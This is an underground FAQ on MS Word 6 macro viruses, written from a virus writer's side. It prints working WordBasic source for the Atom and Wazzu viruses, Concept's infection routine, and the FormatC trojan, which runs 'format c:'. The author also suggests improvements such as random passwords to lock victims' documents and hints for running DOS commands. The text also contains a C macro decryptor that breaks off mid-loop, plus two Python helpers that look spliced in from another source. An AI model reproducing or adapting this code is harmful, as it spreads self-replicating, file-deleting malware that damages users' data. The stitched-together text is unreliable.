
MS WORD 6.x MACRO VIRUSES FAQ

From Higher Intellect Wiki
      --------------------------------------------------------------
			    The UNDERGROUND
		   MS WORD 6.x MACRO VIRUSES FAQ V1.0
		       <Frequently Asked Questions>
		     By      ,
			<****{=============-
			     ' AuRoDrEpH, the Drow
      --------------------------------------------------------------
			   "Help to MICROFUCK WORD."
      --------------------------------------------------------------

      --------------------------------------------------------------

TOPIC 1 : WHAT IS A WORD MACRO VIRUS?
=========================================

A WORD MACRO virus is a macro <list of instructions> or template file
<usually with the .DOT extension> which masquerades as a legitimate MS WORD
document <usually with the extension *.DOC>.  An infected *.DOC file
doesn't look any different to the average PC user, as it can still contain
a normal document.  The difference is that this document is really just a
template or macro file, with instructions to replicate, and possibly cause
damage.  MS WORD will interpret a *.DOT macro/template file as a template
file regardless of its extension.  This allows it to be passed off as a
legitimate document <*.DOC>.  This FAQ takes the position that a document is
meant to be DATA, and a MACRO is at least partially executable CODE.  When
a document has been infected, it has been merged with executable code in a
multi-part file, part data/part executable.  This tends to be hidden from
the user, who expects a document to be data that is READ, and not some
combination of DATA and executable code designed to be executed, often
against the will of the user, to wreak havoc.

These viruses commonly tend to infect the global macros, which get
automatically saved at the end of each session.  When the next session of
MS WORD opens, the infected global macros are executed, the WORD
environment is now infected, and it will in turn be likely to infect documents
whenever they are opened, closed, and created during all future sessions.

As viruses, the WORD MACRO VIRUSES do REPLICATE.  They can spread in most
cases to any MS WINDOWS environment or OS that runs a compatible copy of MS
WORD 6.x or 7.x, MS WORD 6.x running on OS/2, as well as WORD for MAC 6.0
for MacOS.  This makes it a multi-platform/multi-OS file infector.  It also
makes it one of the first non-research viruses to be successfully spread to
all of these environments and OS's.

MS Word Macro Viruses reside in interpreted data that can spread to
different OS's/platforms.  These viruses do not spread via modification of
executable machine code, but by modification of data in files that are
interpreted by the Microsoft Word 6.0 program and any other versions of
Word that support macros and WordBasic.

The WordBasic macro language is much simpler to learn and master than
ASSEMBLER, or other popular higher level programming languages, and for
this reason Vx people <both new and old alike> have taken to it as a
viable alternative to learning and coding ASM.  The thought of ticking
users off on more than one platform has been around for years, and now,
thanks to MS WORD and all its compatible versions on other popular
platforms, the Vx people have their wish.  Another bonus of this new outlet
for Vx writers is that many virus scanners only scan executable files,
leaving the .DOC files of WORD alone.  It is important to note that many AV
producers have now included scanners/cleaners in their software, allowing
for the detection of existing MS WORD macro viruses.


      --------------------------------------------------------------

TOPIC 2: HOW TO STUDY AN INFECTED DOCUMENT
==========================================

You are happy :-) You've found the latest macro virus, and now you want to study
it, find the source code and modify it.
OK, I'll explain... it's very easy.

First of all, make a copy of the NORMAL.DOT file (it's in
MSOFFICE\WINWORD\MODELES).
In most cases the macro virus isn't dangerous, except for the trojan
FORMATC: when you open the document, it formats C:. So a good idea is
to run a TSR anti-virus like VIRSTOP.
Now launch the WORD application (this is the moment the macros execute)...
then go to the menu TOOLS/OPTIONS and, on the SAVE tab, tick the
option "Prompt to Save NORMAL.DOT".

Then take a look at the file with a hex editor.
	A Word document is composed of a first part, the data (text), then
the macros, and in the last part more data (name of the file, ...). OK. Find
the name of the document near the end... and look for a "U". If you see some
U's, this means that the macros are encrypted. You will need more time to study
them, because when you copy a macro, WORD gives you the READONLY (execute-only)
option: you can execute the macro, but you can't see the source...
Near the name you can also see the names of all the macros
included in the file.
The names can give you an idea of what they do,... but be careful !!

Now open the infected document and see what it does. Nothing... That's
normal !! Go to the menu TOOLS/MACRO. You can see the names of the
macros (the same you saw with the hex editor).

IF you can't use the Modify button, the macro is Execute-only...
		THEN go to TOPIC 5.
		ELSE read the script and keep what you want...


TOPIC 3: VIRUS EXAMPLES and what you can keep in mind
======================================================

I have studied some macro viruses for you and I've commented them...

      --------------------------------------------------------------

4.1: Concept Virus :
====================

Also known by the Aliases of WW6Macro, WinWord.Concept, Word Basic Macro
Virus (WBMV), Word Macro 9508 <MAC> and Prank Macro <MicroSoft named it
Prank, to downplay the seriousness of the situation>.  This was the first
MS Macro Virus to be detected by the Anti-Virus community, and the first
Macro Virus to be considered in the wild, with infections spreading to the
US, UK, France, Germany, Bulgaria, Canada, the Netherlands, Turkey, and
Finland, and other Countries.

A CONCEPT infection is easy to notice: on the first execution of the
virus-infected document (on the first opening of the infected file) a
MessageBox appears with the digit "1" inside and an "Ok" button.  Also, simply
checking the TOOLS/MACROS option to check loaded macros, the presence of
Concept is apparent from the appearance of these 5 macros :

       AAAZFS *
       AAAZAO *
       AutoOpen
       PayLoad *
       FileSaveAs

The infection routine of this virus : 

	'see if we're already installed 
	For i = 1 To iMacroCount
		If MacroName$(i, 0, 0) = "PayLoad" Then
			bInstalled = - 1
		End If
		If MacroName$(i, 0, 0) = "FileSaveAs" Then
			bTooMuchTrouble = - 1
		End If
	Next i
	If Not bInstalled And Not bTooMuchTrouble Then
		'add FileSaveAs and copies of AutoOpen and FileSaveAs.
		'PayLoad is just for fun.
		iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
		sMe$ = FileName$()
		sMacro$ = sMe$ + ":Payload"
		MacroCopy sMacro$, "Global:PayLoad"
		sMacro$ = sMe$ + ":AAAZFS"
		MacroCopy sMacro$, "Global:FileSaveAs"
		sMacro$ = sMe$ + ":AAAZFS"
		MacroCopy sMacro$, "Global:AAAZFS"
		sMacro$ = sMe$ + ":AAAZAO"
		MacroCopy sMacro$, "Global:AAAZAO"



At the end of each Macrocopy, you put ,1 and you have Execute-Only macros... 
	just an idea :)

      --------------------------------------------------------------

4.2: Nuclear :
==============

Known widely as Winword.Nuclear, Wordmacro-Nuclear and Wordmacro-Alert.
This virus was the first WordMacro virus to infect <or at least to attempt
to infect> both data/documents <Word Documents .DOT and .DOC> as well as
executables <.COM/.EXE/NEWEXE>

In truth, it is 2 viruses, a macro virus which alters the Operating
Environment of WORD, and an executable file infector <as well as a system
file deleter>.  This makes NUCLEAR the first Macro Virus to also
incorporate, or at least try to incorporate a classic File Infector Virus.
This virus is actually quite ineffective in the destructive sense, as detailed
later in this document. The infected documents contain the following nine
macros...

       AutoExec
       AutoOpen
       FileSaveAs
       FilePrint
       FilePrintDefault
       InsertPayload   *
       Payload         *
       DropSuriv       *
       FileExit

which get copied into the GLOBAL Macro List.

General detection of NUCLEAR is easy, simply view the macros listed under
the Macros command under the Tools Menu.  If Macros "InsertPayload",
"Payload", and "DropSuriv" are listed, then you'll likely have a NUCLEAR
infection. <unless you named legitimate macros with the same names... :) >
NUCLEAR hides itself from detection, by disabling the "PROMPT FOR CHANGES
TO NORMAL.DOT" option.  Changes are made, and the user doesn't notice
anything.


The "InsertPayload" Macro will cause the following text to be added to the
end of printouts when printing documents. Every 12th printout will have the
following text added...

       And finally I would like to say:
       STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC!

which is appended to the file after the command to print is issued but
prior to the actual printing. Faxes sent via a FAX print driver will also
be affected; this much I know first hand.  From testing, I came to the
realization that some Vx putz will start messing with my outgoing faxes
behind our backs.

Another included macro is "Payload", which tries to delete IO.SYS,
MSDOS.SYS and COMMAND.COM on April 5th. It is ineffective, as WordBasic
can't reset the attributes of a file which has the System attribute set.
It has been noted that a variant that does work is being circulated.

The second part of the Nuclear virus is the executable infector.  The
DropSuriv macro checks the system time, and will attempt to drop the file
infector between 17:00 and 18:00.  However, the routine is flawed, and
shouldn't work on any system <it fails due to a syntax error, an unclosed IF
statement, so this payload is never executed>.  If DropSuriv DID work
properly, it would search for the standard DOS utility DEBUG.EXE; if found,
the macro drops PH33r.SCR & EXEC_PH.BAT.  The BAT file is executed, and
then the hex dump file PH33r.SCR is converted from a DEBUG script into an
executable, which is in turn executed.  Later, the .SCR and the .BAT files
are deleted to cover its tracks.  The file infector then hooks INT 21h and
writes itself at the end of COM/EXE/NewEXE files.  <However, the memory is
released once this DOS task is completed, including the memory resident
virus Ph33r.>  Unconfirmed reports state that a NUCLEAR infected macro with a
fully operational DropSuriv macro exists.

The following text strings are in the executable infector...

       =Ph33r=
       Qark/VLAD

The virus group VLAD published it in their issue #4 (the complete version of
this virus, I think), so look for it on the Net.
      --------------------------------------------------------------

4.3:  Colors:
=============

Colors, is the first WINWORD Macro Virus that could be called cute <IMHO>.
This Virus has the noticeable ability to alter the Windows colors settings.
  If iModEvery = (iEvery - 1) Then          
		sColors$(0) = "Background"
		sColors$(1) = "AppWorkspace"
		...
		sColors$(19) = "InactiveTitleText"
		sColors$(20) = "ButtonHilight"
		
	 For i = 0 To 20
	       SetProfileString("colors", sColors$(i), Str$(Int(Rnd() * 256)) + " "
		   + Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)))
	 Next i
  End If

Mac Word is immune to the payload <the system colors attack> but is still
susceptible to the infection mechanism, which will attack documents.
Detection of infections is easy, as infected documents appear with the
template icon, rather than the usual document icon.

Commonly known as Rainbow or WordMacro.Colors, this virus was freely posted
to usenet newsgroups on October 14th, 1995. The Colors Virus will infect
the global template <usually NORMAL.DOT> upon opening of an infected
document.  An infected document contains the following macros:

       AutoOpen
       AutoClose
       AutoExec
       FileNew
       FileExit
       FileSave
       FileSaveAs
       ToolsMacro, and other macros.

All Macros included in COLORS are Execute-Only, and cannot be viewed or
edited by MicroSoft Word.  If normal "clean" macros with the same names
existed prior to infection, they will be overwritten by COLORS.

The AutoExec macro of COLORS is an EMPTY macro, possibly designed to defeat
any ANTI-MACRO-VIRUS schemes developed by the AV community.  It
accomplishes this by overwriting a "CLEANING/SCANNER" AutoExec macro with
COLORS' empty one, effectively making the AV scanner/cleaner useless.

COLORS will also enable AutoMacros in case you were smart and disabled
them!  It will also disable the MS Word's Prompt to save changes to
NORMAL.DOT.  

 [      OutilsOptionsEnregistrement .InviteGlobalDot = 0 ]  Very interesting


COLORS is crafty, as it can spread without the use of AUTO macros...  thus
defeating the DISABLE AUTOMACROS Feature.  It does so via the Macros:

       File/New
       File/Save
       File/SaveAs
       File/Exit
       Tools/Macro

COLORS will infect NORMAL.DOT whenever a user chooses any of the above
functions.  It also has limited stealth ability, earning it the title of
being the first WINWORD STEALTH MACRO VIRUS.  It accomplishes its stealth
actions by hiding itself from the active listing: attempting to view
active macros would run the COLORS-infected Tools/Macro, thus hiding its
own presence while simultaneously infecting your system.
 
 [   MacroTools .Name = sNames$(i), .Print = 1, .Delete    ] Good !!!

The COLORS virus will keep track of infections via a counter, named
"countersu", which can be found under the [Windows] section of the WIN.INI
file.  Whenever an infected macro is executed, the counter is incremented
by a count of one.  It quickly adds up, when you consider how much you
OPEN, CREATE, SAVE, EXIT, and CLOSE documents.  When the increment counter
reaches 299, and every 300th execution thereafter, COLORS will be
triggered.  COLORS will then make changes to the system colors setup,
including text, background, borders, buttons, etc., using randomly
determined colors.  The new color scheme becomes apparent to the user
during the next session of Windows.

Colors' ability to spread without the use of AutoExecute macros, and its use
of advanced stealth techniques, signals a new level of MACRO virus
technology.  <Hiding itself from view when you actively look for it defines
STEALTH in my book, since it evades detection.>  It also adds fuel to the VxD
argument, as an on-access scanner could prevent infection by this type of
stealthy virus.

You have the complete disassembly in the previous issue.. so download it...
      --------------------------------------------------------------

4.4: DMV:
=========

Commonly known as WordMacro.DMV, DMV is an unremarkable TEST virus,
possibly the first to be created using the WordBasic language.  Joel
McNamara wrote it in the fall of 1994, as a real time TEST for some MACRO
virus theories.  The virus was kept under wraps, and a detailed paper was
published.  This TEST virus was only released, as an educational aid, after
the CONCEPT virus was discovered.  DMV isn't a threat to anyone, as it
announces itself upon infecting the system.

Nothing to say, it's an old virus, and by now all the techniques it uses are
detected by most AV products.
      --------------------------------------------------------------

4.5: HOT:
=========

Also known as WORDMACRO HOT, WinWord.Hot.

Not the most ingenious of the macro virus family, its biggest kick is the
ability to wait or sleep for a while <up to 14 days> and then delete a file.
WordMacro/Hot appears to be the first Word macro virus written in Russia.
It was found in the wild in Russia in January 1996.

Infected documents contain four execute-only macros:

	AutoOpen
	DrawBringInFrOut
	InsertPBreak
	ToolsRepaginat

Macintosh Word users will notice HOT by examining the icon of the file...
infected documents appear with the template icon, normal documents appear
with the normal document icon.

NOTE: WordMacro/Hot appears to be the first macro virus to use external
functions, allowing Word macros to call any standard Windows API call.
This makes the spreading function Windows 3.x specific, preventing Word for
MAC and Word 7 for Win '95 from spreading the Virus.  An error dialog will
be displayed under Microsoft Word 7.0.

	Unable to load specified library

HOT activates automatically via its AutoOpen macro <assuming no attempt to
disable AutoMacros has been made>, adding a line LIKE...

	QLHot=34512

to Ms Word for Windows 6's WinWord6.INI file, which acts as a counter
recorder system, setting a date 14 days in the future for payload
activation.

HOT then copies the included macros to the Global Template, NORMAL.DOT
usually, revising their names...

	AutoOpen          ==>   StartOfDoc
	DrawBringInFrOut  ==>   AutoOpen
	InsertPBreak      ==>   InsertPageBreak
	ToolsRepaginat    ==>   FileSave

A listing of the currently loaded macros in this infected environment will
reveal the names in the right list.  Loading another infected document
<actually a template> will add the left list to the macro list plus the
right list.  NOTE:   Macros have been saved with the 'execute-only'
feature, which means  that a user can't view or edit them.

A clean <AutoMacros disabled> WORD environment will produce the left list
when viewing an infected document.
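A defender's version of the "just look at the macro list" detection that the Concept, Nuclear, Colors and Hot sections describe, together with a check for the counters Colors keeps in WIN.INI ("countersu") and Hot in WINWORD6.INI ("QLHot"). This is an added example, not code from this FAQ or its author: the name lists and INI keys are the ones quoted in the sections above, while the matching logic, function names, sample macro lists and INI text are mine and constructed. The [Microsoft Word] section in the WINWORD6.INI sample is an assumption; the FAQ does not say which section QLHot lives in.

```python
"""Indicator check for the Word 6 macro viruses described in this FAQ.

Added example, not the FAQ author's code: the macro-name lists come from the
Concept, Nuclear, Colors and Hot sections, the INI keys from the Colors
("countersu" in WIN.INI) and Hot ("QLHot" in WINWORD6.INI) sections.  The
macro lists and INI text used below are constructed test data, not real files.
"""
import configparser
from typing import Iterable

# Distinctive macro names per family, as listed in the FAQ.  Matching is
# case-insensitive because Word does not distinguish case in macro names.
MACRO_SIGNATURES = {
    "Concept": {"AAAZFS", "AAAZAO", "PayLoad"},
    "Nuclear": {"InsertPayload", "Payload", "DropSuriv"},
    "Colors": {"AutoOpen", "AutoClose", "AutoExec", "FileNew",
               "FileExit", "FileSave", "FileSaveAs", "ToolsMacro"},
    # Hot renames its macros when it copies them into NORMAL.DOT, so the
    # names seen in a document differ from those seen in the global list.
    "Hot (document)": {"AutoOpen", "DrawBringInFrOut", "InsertPBreak",
                       "ToolsRepaginat"},
    "Hot (global template)": {"StartOfDoc", "AutoOpen", "InsertPageBreak",
                              "FileSave"},
}

# INI keys the FAQ names as infection counters.  configparser lower-cases
# keys, so the lookup keys are lower case too.
INI_INDICATORS = {"countersu": "Colors", "qlhot": "Hot"}


def match_macro_names(macro_names: Iterable[str]) -> list[str]:
    """Families whose complete distinctive name set is present.

    Every name of a signature must be there: a lone AutoOpen or FileSave is
    normal, it is the combination with the odd names that is the indicator.
    """
    present = {name.lower() for name in macro_names}
    return [family for family, names in MACRO_SIGNATURES.items()
            if {n.lower() for n in names} <= present]


def find_ini_indicators(ini_text: str) -> list[tuple[str, str, str, str]]:
    """Scan INI text for the counter keys; returns (family, section, key, value)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True)
    cp.read_string(ini_text)
    found = []
    for section in cp.sections():
        for key, value in cp.items(section):
            family = INI_INDICATORS.get(key)
            if family is None:
                continue
            # The FAQ places Colors' counter under [Windows]; it does not say
            # which section Hot uses, so any section is accepted for Hot.
            if family == "Colors" and section.lower() != "windows":
                family = "Colors? (unexpected section)"
            found.append((family, section, key, value or ""))
    return found


def colors_trigger_due(counter: int) -> bool:
    """Colors fires when its counter reaches 299 and every 300th run after."""
    return (counter + 1) % 300 == 0


# Constructed sample data for a stand-alone run (not real files).
SAMPLE_DOC_MACROS = ["AutoOpen", "FileSaveAs", "AAAZFS", "AAAZAO", "PayLoad"]
SAMPLE_WIN_INI = """[windows]
load=
run=
countersu=298
[Desktop]
Pattern=(None)
"""
SAMPLE_WINWORD6_INI = """[Microsoft Word]
QLHot=34512
"""

if __name__ == "__main__":
    print("macro names  :", match_macro_names(SAMPLE_DOC_MACROS))
    for sample in (SAMPLE_WIN_INI, SAMPLE_WINWORD6_INI):
        for family, section, key, value in find_ini_indicators(sample):
            print("ini indicator:", family, "[%s] %s=%s" % (section, key, value))
    print("Colors counter 298 fires on the next increment:",
          colors_trigger_due(298 + 1))
```

The name check deliberately requires the whole signature set: AutoOpen or FileSave on their own are ordinary, as the Nuclear section's own caveat about legitimately named macros points out, so only the combination with the odd names (AAAZFS, DropSuriv, StartOfDoc, ...) is reported.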

HOT's FileSave macro causes the virus to randomly decide, within 1-6 days
from the infection date, to activate whenever an effort to open files is
made.  Upon activation, a document will have its contents deleted, by
opening it, selecting the entire contents, deleting them, and closing the
document, saving it in its now empty state.

Users with c:\DOS\EGA5.CPI should be protected from this macro, as the
author included a check for this file as a protective measure, noted in the
source code as follows:

  '---------------------------------------------------------------
  '- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
  '- and if File C:DOSega5.cpi not exist (not for OUR friends) ---
  '---------------------------------------------------------------

HOT's InsertPBreak macro inserts a page break in current documents, which
is used as a sign of a document already being infected by HOT.

NOTE:  WordMacro/Hot relies on the existence of KERNEL.EXE

I can see this macro, if you have it, please send it to the mag.... thanks

      --------------------------------------------------------------

4.6: MS WORD 2/MS WORD 6.x MACRO TROJAN WEIDEROFFEN:
====================================================

This is a new MACRO trojan <that's been around for 2 years> that goes by
the alias WinWord.Weideroffnen.  It is technically a WinWord 2 infected
document, that works equally well under MS WORD 6.x.  It intercepts
AutoClose, and attempts to play tricks with the boot-up file AUTOEXEC.BAT.

I haven't seen this macro virus, so I don't know...

      --------------------------------------------------------------


4.7  WORDMACRO ATOM / ATOMIC
=============================

This is a new Macro Virus, found in February 1996, which works along the
same general ideas as the original Concept virus. The WordMacro/Atom virus
is not known to be in the wild.

The differences, when compared to the Concept virus, are as follows:

       - All the macros in this virus have been marked EXECUTE ONLY,
	 making them encrypted
       - Replication occurs both during file openings and file saves.
       - Atom comes with 2 destructive payloads

On December 13th, its first point of activation occurs.  It will attempt
to delete all files in the current file directory.

The second activation password-protects documents, restricting the users'
access to their own documents.  This happens when the system clock seconds
counter equals 13 and a File/Save As command is issued.  The password
assigned to the documents is ATOM#1.

If the user disables AUTOMACROS, Atom will be unable to execute and spread
to other documents.  Enabling the Prompt To Save NORMAL.DOT will prevent
Atom from attacking and infecting the NORMAL.DOT file.

Here is the source :
	Keep in mind the idea of putting a password on a file, not a bad idea....
Macros: Atom

Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
	Kill "*.*"
End If
KillError:
End Sub



Macros: AutoOpen

Sub MAIN
Dim FN$
FN$ = FileName$()
On Error Goto ErrorInfectGlobalTemplate
If (CheckInfected = 0) Then
	MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
	MacroCopy FN$ + ":FileOpen", "FileOpen", 1
	MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
	MacroCopy FN$ + ":Atom", "Atom", 1
	SaveTemplate            
End If
Call Atom
ErrorInfectGlobalTemplate:
End Sub

Function CheckInfected
CheckInfected = 0
If (CountMacros(0) >= 4) Then
	For I = 1 To CountMacros(0)
		If (MacroName$(I, 0) = "Atom") Then
			CheckInfected = 1
		End If                  
	Next I             
End If
End Function



Macros: FileOpen

Sub MAIN
On Error Goto InfError
Dim dlg As FileOpen
GetCurValues dlg
Dialog dlg
FileOpen dlg
MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1
MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1
MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1
MacroCopy "Atom", Dlg.Name + ":Atom", 1
FileSaveAs .Format = 1
InfError:
End Sub



Macros: FileSaveAs

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (Dlg.Format = 1) Then
	MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1
	MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1
	MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1
	MacroCopy "Atom", WindowName$() + ":Atom", 1
	Dlg.Format = 1
End If
If (Second(Now()) = 13) Then        ' easy... to block a document
	Dlg.Password = "ATOM#1"     ' an idea: why not put a randomized passwd ?
End If  
FileSaveAs dlg
End Sub

      --------------------------------------------------------------

4.9  FORMATC MACRO TROJAN
==========================

Also known as WORDMACRO.FORMATC, and FORMAT.C.Macro.Trojan

The FORMATC macro virus isn't even a virus, as it DOES NOT SPREAD.  This
makes it another MACRO TROJAN.  This trojan contains only one macro,
AutoOpen, which will be executed automatically when a document is opened.
The macro AutoOpen is READ ONLY, making it encrypted, and unreadable and
uneditable.  It is visible in the macro list.

When FORMATC is executed, "triggered", it will run a DOS session in a
minimized DOS box.  It will run an unconditional format of the C drive.

Here is the macro (basic) but deadly...
Sub MAIN
	sCmd$ = "echo y|format c: /u"
	Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0
End Sub

If you want to execute DOS commands, you have here a hint on how to do it.

4.10  WORDMACRO WAZZU
=======================
WordMacro/Wazzu consists of a single AutoOpen macro; this makes it language
independent, i.e. this macro virus is able to infect localized versions of
Word as well as the English Word.

It inserts the word "wazzu" into your text ... why not....
Nothing more to say, classic...

Sub MAIN
	On Error Goto errCaught
		
	FileSummaryInfo .Update
	Dim dlg As FileSummaryInfo
	GetCurValues dlg

	fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
	globMacro$ = "Global:autoOpen"
	MacroFile$ = UCase$(Right$(MacroFileName$(MacroName$(0)), 10))

	If MacroFile$ = "NORMAL.DOT" Then
		MacroCopy globMacro$, fileMacro$
		FileSaveAs .Format = 1
	Else
		MacroCopy fileMacro$, globMacro$
	End If

	Payload

Goto bye
errCaught:

bye:
	On Error Goto 0

End Sub

Sub Payload
	For i = 1 To 3
		If Rnd() < 0.2 Then
			RndWord
			SelectCurWord
			selWord$ = Selection$()
			DeleteWord

			RndWord
			Insert selWord$ + " "
		End If
	Next

	If Rnd() < 0.25 Then
		RndWord
		Insert "wazzu "  ' <------------------- here's the payload
		StartOfDocument
	End If

End Sub

Sub RndWord
	FileSummaryInfo .Update
	Dim dlg As DocumentStatistics
	GetCurValues dlg

	wordNum = Int(Rnd() * Val(dlg.Words))
	StartOfDocument
	WordRight wordNum
End Sub


TOPIC 5: WHAT TO DO WITH EXECUTE-ONLY MACROS
============================================

Easy: when you copy a macro with the option 1, Microsoft Word encrypts the
source of the macro, so when you look at the file you can't see it....
But the encryption they use is stupid :))) a single XOR value... so the only
difficult thing is to find the XOR key... you must scan the file,
and the XOR value is included in it...

I explain the method :
	Locate the "real" filename of the document within the document.
	A few bytes after the end of the name there is a "U"; the byte
		immediately following is the ... XOR value to use.
	Now find the beginning of the macros; they are usually at B89h or
		at 1509h. To locate them, there is always the sequence
		A5h C6h 41h, then a byte, and then the XOR value....

This is the standard method. You must know that each macro has its own XOR
value... when you look for the filename, you will find as many U's as there
are macros in the document.

I encountered some difficulties when the document is composed of encrypted macros
and normal macros... In this case, try to delete some macros and decrypt...
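The method of TOPIC 2 (find the name and the U's with a hex editor) and of this topic (read the key after the U, find A5 C6 41, XOR the body) as one small Python analysis script. This is an added example, not the FAQ author's tool and not a parser for the real Word 6 file format: it assumes only the layout the FAQ states (name stored upper-cased near the end, one 'U' marker plus key byte per execute-only macro, markers 24 bytes apart as the FAQ's C tool steps, body after A5 C6 41 <byte> <key>, body ending at the decoded bytes 64 1A 1B). SAMPLE_DOC is a buffer I constructed to that description, so real documents may not match it exactly; the function names are mine.

```python
"""Recovering execute-only (XOR-obfuscated) macros the way Topics 2 and 5 of
this FAQ describe it: find the document's name, the 'U' markers and key bytes
after it, the A5 C6 41 macro header, then XOR the body back.

Added example, not the FAQ author's tool.  It assumes only the layout the FAQ
states: the name is stored upper-cased near the end of the file, each
execute-only macro contributes a 'U' (0x55) marker after it followed by that
macro's key byte (the FAQ's C tool spaces the markers 24 bytes apart), a macro
body follows A5 C6 41 <byte> <key>, and the body ends where the decoded bytes
64 1A 1B appear.  SAMPLE_DOC is constructed to that description; it is not a
real document, and real files may not match the layout exactly.
"""

MACRO_HEADER = bytes([0xA5, 0xC6, 0x41])
MACRO_END = bytes([0x64, 0x1A, 0x1B])   # end marker as it looks after decoding
MARKER_STRIDE = 24                       # distance between 'U' markers (FAQ tool)


def find_keys(doc: bytes, doc_name: str, macro_count: int) -> list[int]:
    """One XOR key per execute-only macro, read from the 'U' markers."""
    name = doc_name.upper().encode("ascii")
    name_at = doc.find(name)
    if name_at < 0:
        raise ValueError("document name not found in the file")
    marker = doc.find(b"U", name_at + len(name))
    if marker < 0:
        raise ValueError("no 'U' key marker after the document name")
    keys = []
    for _ in range(macro_count):
        if marker + 1 >= len(doc) or doc[marker] != 0x55:
            break                        # fewer markers than macros claimed
        keys.append(doc[marker + 1])
        marker += MARKER_STRIDE
    return keys


def find_macro_start(doc: bytes, key: int) -> int:
    """Offset of the first body byte of the macro whose header carries `key`."""
    at = doc.find(MACRO_HEADER)
    while at >= 0:
        if at + 4 < len(doc) and doc[at + 4] == key:
            return at + 5                # body follows <byte> <key>
        at = doc.find(MACRO_HEADER, at + 1)
    raise ValueError("no macro header carries key 0x%02x" % key)


def decrypt_macro(doc: bytes, start: int, key: int) -> bytes:
    """XOR the body with its single-byte key up to the decoded end marker.

    A fixed single-byte XOR is undone by anyone who reads the key out of the
    file, which is why 'execute-only' hides the source from Word's editor
    but not from an analyst.
    """
    out = bytearray()
    for b in doc[start:]:
        out.append(b ^ key)
        if out.endswith(MACRO_END):
            return bytes(out[:-len(MACRO_END)])
    raise ValueError("macro end marker not found before end of file")


def recover_macros(doc: bytes, doc_name: str, macro_count: int) -> list[bytes]:
    """Decode every execute-only macro the file carries, in marker order."""
    return [decrypt_macro(doc, find_macro_start(doc, k), k)
            for k in find_keys(doc, doc_name, macro_count)]


# --- constructed sample following the FAQ's description (not a real .DOC) ---
SAMPLE_NAME = "sample.doc"
SAMPLE_SOURCES = [b'Sub MAIN\r\nMsgBox "1"\r\nEnd Sub\r\n',
                  b'Sub MAIN\r\nInsertPara\r\nEnd Sub\r\n']
SAMPLE_KEYS = [0x3C, 0x5B]


def build_sample(name: str, sources: list[bytes], keys: list[int]) -> bytes:
    doc = bytearray(b"Plain document text comes first in the file. ")
    for src, key in zip(sources, keys):
        doc += MACRO_HEADER + b"\x01" + bytes([key])
        doc += bytes(b ^ key for b in src + MACRO_END)
    doc += b"\x00" * 8 + name.upper().encode("ascii") + b"\x00\x00\x00"
    for key in keys:                     # 'U' <key>, MARKER_STRIDE bytes apart
        doc += b"U" + bytes([key]) + b"\x00" * (MARKER_STRIDE - 2)
    return bytes(doc)


SAMPLE_DOC = build_sample(SAMPLE_NAME, SAMPLE_SOURCES, SAMPLE_KEYS)

if __name__ == "__main__":
    for n, src in enumerate(recover_macros(SAMPLE_DOC, SAMPLE_NAME, 2), 1):
        print("macro %d:" % n)
        print(src.decode("ascii"))
```

The only thing that makes this "decryption" possible is that the key sits in the file next to the marker and is a single byte; find_keys stops early when a file carries fewer markers than the number of macros you claim, so the count you type in is only an upper bound.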

I can give you a little C source to help you. This source uses a crude method, so you will get
1 macro readable per file.... try it with the COLORS macro (last issue). I know
that the program works.
- --><-cut here---------------------------------
/*********
  (c) AURODREPH Productions 04/1996
  Headers and file I/O changed to standard C (stdio) so that it builds with
  any current compiler; the search and XOR logic is the original's, with
  the brace error in the name search and the end-of-macro look-ahead fixed.
**********/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
	char Name[13];
	char Target[13];
	unsigned char *Buffer;
	FILE *Input, *Output;
	unsigned long Offset;
	unsigned long Length = 0;
	long point, max, trouve, debmac, decfin;
	long stop, nbr, positcle, nbrmac, i;
	int cledec;

	printf (" ******************************************************************\n");
	printf (" *                                                                *\n");
	printf (" *               DECRYPT WORD 6.0 MACROS saved                    *\n");
	printf (" *                 with the option Execute-only                   *\n");
	printf (" *                                                                *\n");
	printf (" *                                                                *\n");
	printf (" *       --- ,This file works only with files < 32 Ko. ----       *\n");
	printf (" *     <*****}===============-                                    *\n");
	printf (" *      (z)  ' AURODREPH Productions 04/1996                      *\n");
	printf (" *                                                     ver 0.666B *\n");
	printf (" ******************************************************************\n");
	printf ("\n"); printf("\n");
	printf ("Name of the input file     = ");
	if (scanf ("%12s", Name) != 1) return 1;
	printf ("\n");
	printf ("Name of the output file    = ");
	if (scanf ("%12s", Target) != 1) return 1;
	printf ("\n");
	printf ("Number of crypted macros   = ");
	if (scanf ("%ld", &nbrmac) != 1) return 1;
	printf ("\n");
	if (nbrmac > 50) { return 1; }

	Input = fopen (Name, "rb");
	if (Input == NULL)
		{printf ("The input file doesn't exist.\n"); return 1;}

	fseek (Input, 0, SEEK_END);
	Length = (unsigned long) ftell (Input);
	fseek (Input, 0, SEEK_SET);
	Buffer = (unsigned char *) malloc (Length);
	if (Buffer == NULL)
		{printf ("Fail memory allocation.\n"); return 1;}
	if (fread (Buffer, 1, Length, Input) != Length)
		{printf ("Can't read the whole file.\n");
		 printf ("Try to remove some macros with WORD....\n");
		 return 1;}

	max = strlen (Name);
	trouve = 1;
	cledec = 0x00;
	debmac = 0x00;
	positcle = 0;
	stop = 0;
	/* the document stores its own name in upper case */
	for (i = 0; i < max; i++)
		{if ((Name[i] >= 0x61) && (Name[i] <= 0x7A))
			{ Name[i] = Name[i] & 0xDF; }
		}

	/* 1. locate the file name, then the 'U' marker that follows it:
	      the byte after the 'U' is the XOR key of the first macro */
	for (Offset = 0; Offset + 1 < Length; Offset++)
	 {
